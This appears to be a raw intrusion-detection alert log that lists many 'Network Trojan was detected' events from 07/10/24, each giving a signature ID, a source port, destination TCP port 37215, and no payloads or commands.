                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.979728
                  SID:2829579
                  Source Port:54430
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.415941
                  SID:2835222
                  Source Port:52116
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.615423
                  SID:2835222
                  Source Port:41286
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.494437
                  SID:2829579
                  Source Port:32930
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.869440
                  SID:2829579
                  Source Port:44028
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.833831
                  SID:2829579
                  Source Port:35872
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.206517
                  SID:2835222
                  Source Port:45738
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.357123
                  SID:2835222
                  Source Port:50452
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.202638
                  SID:2835222
                  Source Port:37102
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.862502
                  SID:2829579
                  Source Port:44592
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.639186
                  SID:2835222
                  Source Port:36238
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.273246
                  SID:2835222
                  Source Port:43198
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.900161
                  SID:2829579
                  Source Port:45468
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.822336
                  SID:2829579
                  Source Port:53000
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.923220
                  SID:2829579
                  Source Port:39012
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.283618
                  SID:2835222
                  Source Port:35836
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.146425
                  SID:2829579
                  Source Port:53798
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.363938
                  SID:2829579
                  Source Port:51712
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.822486
                  SID:2829579
                  Source Port:46436
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.746309
                  SID:2835222
                  Source Port:53670
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.492414
                  SID:2835222
                  Source Port:49702
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.359500
                  SID:2835222
                  Source Port:43106
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.434935
                  SID:2829579
                  Source Port:55912
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.312291
                  SID:2835222
                  Source Port:59154
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.417539
                  SID:2835222
                  Source Port:54770
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.620652
                  SID:2829579
                  Source Port:54348
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.636367
                  SID:2835222
                  Source Port:37970
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.861312
                  SID:2829579
                  Source Port:45394
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.573652
                  SID:2829579
                  Source Port:33814
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.605361
                  SID:2835222
                  Source Port:60306
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.133887
                  SID:2829579
                  Source Port:33244
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.613334
                  SID:2835222
                  Source Port:33154
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.853234
                  SID:2835222
                  Source Port:37146
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.939160
                  SID:2829579
                  Source Port:54988
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.250416
                  SID:2835222
                  Source Port:35356
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:03.002542
                  SID:2829579
                  Source Port:58764
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.822075
                  SID:2835222
                  Source Port:39872
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.501573
                  SID:2829579
                  Source Port:51338
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.412614
                  SID:2829579
                  Source Port:34466
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.647705
                  SID:2829579
                  Source Port:48724
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.083830
                  SID:2835222
                  Source Port:42338
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.438219
                  SID:2835222
                  Source Port:49190
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.757690
                  SID:2835222
                  Source Port:40252
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:18.003215
                  SID:2829579
                  Source Port:39580
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.870524
                  SID:2829579
                  Source Port:47782
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.446313
                  SID:2829579
                  Source Port:35716
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.784576
                  SID:2835222
                  Source Port:58464
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.291888
                  SID:2835222
                  Source Port:39556
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.526473
                  SID:2829579
                  Source Port:60562
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.647957
                  SID:2829579
                  Source Port:60724
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.883548
                  SID:2835222
                  Source Port:43678
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.204295
                  SID:2835222
                  Source Port:49080
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.666714
                  SID:2835222
                  Source Port:37054
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.956941
                  SID:2835222
                  Source Port:40936
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.217078
                  SID:2829579
                  Source Port:60214
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.748001
                  SID:2835222
                  Source Port:50266
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.829159
                  SID:2829579
                  Source Port:59170
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.893139
                  SID:2835222
                  Source Port:39698
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.872449
                  SID:2835222
                  Source Port:45538
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.341806
                  SID:2829579
                  Source Port:55602
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.603545
                  SID:2829579
                  Source Port:49844
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.153609
                  SID:2829579
                  Source Port:54422
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.155624
                  SID:2829579
                  Source Port:46868
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.801295
                  SID:2829579
                  Source Port:36718
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.757409
                  SID:2835222
                  Source Port:50356
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.168197
                  SID:2829579
                  Source Port:60580
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.278406
                  SID:2835222
                  Source Port:51288
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.330263
                  SID:2829579
                  Source Port:35348
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.873682
                  SID:2829579
                  Source Port:57214
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.434490
                  SID:2829579
                  Source Port:38496
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.784131
                  SID:2835222
                  Source Port:48138
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.787511
                  SID:2829579
                  Source Port:37108
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.592956
                  SID:2835222
                  Source Port:43348
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.655390
                  SID:2829579
                  Source Port:47416
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.887676
                  SID:2829579
                  Source Port:42130
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.447163
                  SID:2829579
                  Source Port:44782
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.315486
                  SID:2829579
                  Source Port:57936
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.776398
                  SID:2829579
                  Source Port:43314
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.545208
                  SID:2829579
                  Source Port:51316
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.279073
                  SID:2835222
                  Source Port:42784
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.210999
                  SID:2829579
                  Source Port:58398
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.877678
                  SID:2829579
                  Source Port:59730
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.778453
                  SID:2835222
                  Source Port:40426
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.609585
                  SID:2829579
                  Source Port:43840
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.467339
                  SID:2829579
                  Source Port:54360
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.833960
                  SID:2835222
                  Source Port:57890
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.607824
                  SID:2835222
                  Source Port:39848
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.539447
                  SID:2835222
                  Source Port:42124
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.807030
                  SID:2829579
                  Source Port:52598
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.334361
                  SID:2835222
                  Source Port:48926
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.623309
                  SID:2835222
                  Source Port:41150
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.179861
                  SID:2835222
                  Source Port:38954
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.802348
                  SID:2835222
                  Source Port:49790
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.646644
                  SID:2829579
                  Source Port:40186
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.694487
                  SID:2829579
                  Source Port:46314
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.626049
                  SID:2829579
                  Source Port:33596
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.766765
                  SID:2835222
                  Source Port:48442
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.667914
                  SID:2835222
                  Source Port:56946
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.596939
                  SID:2829579
                  Source Port:58804
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.545496
                  SID:2829579
                  Source Port:41010
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.290878
                  SID:2835222
                  Source Port:41268
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.914738
                  SID:2835222
                  Source Port:59776
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.794005
                  SID:2829579
                  Source Port:46092
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.939164
                  SID:2829579
                  Source Port:53564
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.927122
                  SID:2829579
                  Source Port:38678
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.298145
                  SID:2829579
                  Source Port:33210
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.172380
                  SID:2829579
                  Source Port:57548
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:51.986652
                  SID:2829579
                  Source Port:40178
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.592095
                  SID:2835222
                  Source Port:43410
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.807420
                  SID:2829579
                  Source Port:42460
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.251159
                  SID:2835222
                  Source Port:57172
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.546157
                  SID:2835222
                  Source Port:41330
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.273109
                  SID:2829579
                  Source Port:57710
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.224189
                  SID:2829579
                  Source Port:36040
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.232329
                  SID:2835222
                  Source Port:57122
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.647061
                  SID:2835222
                  Source Port:39924
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.516080
                  SID:2829579
                  Source Port:46932
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.939725
                  SID:2829579
                  Source Port:59366
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.079207
                  SID:2829579
                  Source Port:46902
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.624566
                  SID:2835222
                  Source Port:34452
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.423291
                  SID:2835222
                  Source Port:58296
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.560795
                  SID:2829579
                  Source Port:45486
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.514998
                  SID:2835222
                  Source Port:58588
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.588123
                  SID:2829579
                  Source Port:42058
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.795318
                  SID:2835222
                  Source Port:36326
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.587854
                  SID:2835222
                  Source Port:60562
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.641903
                  SID:2835222
                  Source Port:47870
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.140373
                  SID:2835222
                  Source Port:43590
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.094714
                  SID:2835222
                  Source Port:56750
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.529694
                  SID:2829579
                  Source Port:45126
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:18.012048
                  SID:2829579
                  Source Port:58506
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.198871
                  SID:2835222
                  Source Port:54962
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.022999
                  SID:2829579
                  Source Port:54814
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.891775
                  SID:2835222
                  Source Port:42004
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.154328
                  SID:2835222
                  Source Port:49702
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.672315
                  SID:2835222
                  Source Port:37878
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:51.997172
                  SID:2829579
                  Source Port:59770
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.446454
                  SID:2829579
                  Source Port:48248
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.259501
                  SID:2835222
                  Source Port:34286
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.927319
                  SID:2835222
                  Source Port:56534
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.861773
                  SID:2829579
                  Source Port:55020
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.777569
                  SID:2835222
                  Source Port:52170
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.499422
                  SID:2829579
                  Source Port:48812
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.931140
                  SID:2829579
                  Source Port:35812
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.644230
                  SID:2829579
                  Source Port:50540
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.645401
                  SID:2835222
                  Source Port:48146
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.295095
                  SID:2829579
                  Source Port:34910
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.864759
                  SID:2835222
                  Source Port:37412
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.824127
                  SID:2835222
                  Source Port:53578
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.941033
                  SID:2829579
                  Source Port:45468
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.944748
                  SID:2835222
                  Source Port:58702
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.217883
                  SID:2835222
                  Source Port:52734
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.774106
                  SID:2829579
                  Source Port:52156
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.882743
                  SID:2835222
                  Source Port:43052
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.657755
                  SID:2829579
                  Source Port:36666
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.339204
                  SID:2835222
                  Source Port:39366
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.437986
                  SID:2829579
                  Source Port:45268
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.528499
                  SID:2829579
                  Source Port:46952
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.583979
                  SID:2835222
                  Source Port:48954
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.230941
                  SID:2835222
                  Source Port:48250
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.856885
                  SID:2835222
                  Source Port:60372
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.438982
                  SID:2829579
                  Source Port:50966
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.798286
                  SID:2829579
                  Source Port:49360
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.430208
                  SID:2835222
                  Source Port:37408
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.867882
                  SID:2829579
                  Source Port:51614
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.999719
                  SID:2835222
                  Source Port:60414
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.418572
                  SID:2829579
                  Source Port:39246
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.603168
                  SID:2829579
                  Source Port:44928
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.712584
                  SID:2835222
                  Source Port:42652
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.895746
                  SID:2835222
                  Source Port:36864
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.777046
                  SID:2829579
                  Source Port:57564
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.549975
                  SID:2835222
                  Source Port:33394
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.395055
                  SID:2835222
                  Source Port:39670
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.868570
                  SID:2829579
                  Source Port:58338
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.278598
                  SID:2835222
                  Source Port:59320
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.784523
                  SID:2829579
                  Source Port:55586
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.460773
                  SID:2829579
                  Source Port:51626
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.116732
                  SID:2835222
                  Source Port:48560
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.881583
                  SID:2829579
                  Source Port:49290
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.780155
                  SID:2829579
                  Source Port:53260
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.952819
                  SID:2835222
                  Source Port:40778
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.130427
                  SID:2835222
                  Source Port:54302
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.383981
                  SID:2829579
                  Source Port:54850
                  Destination Port:37215
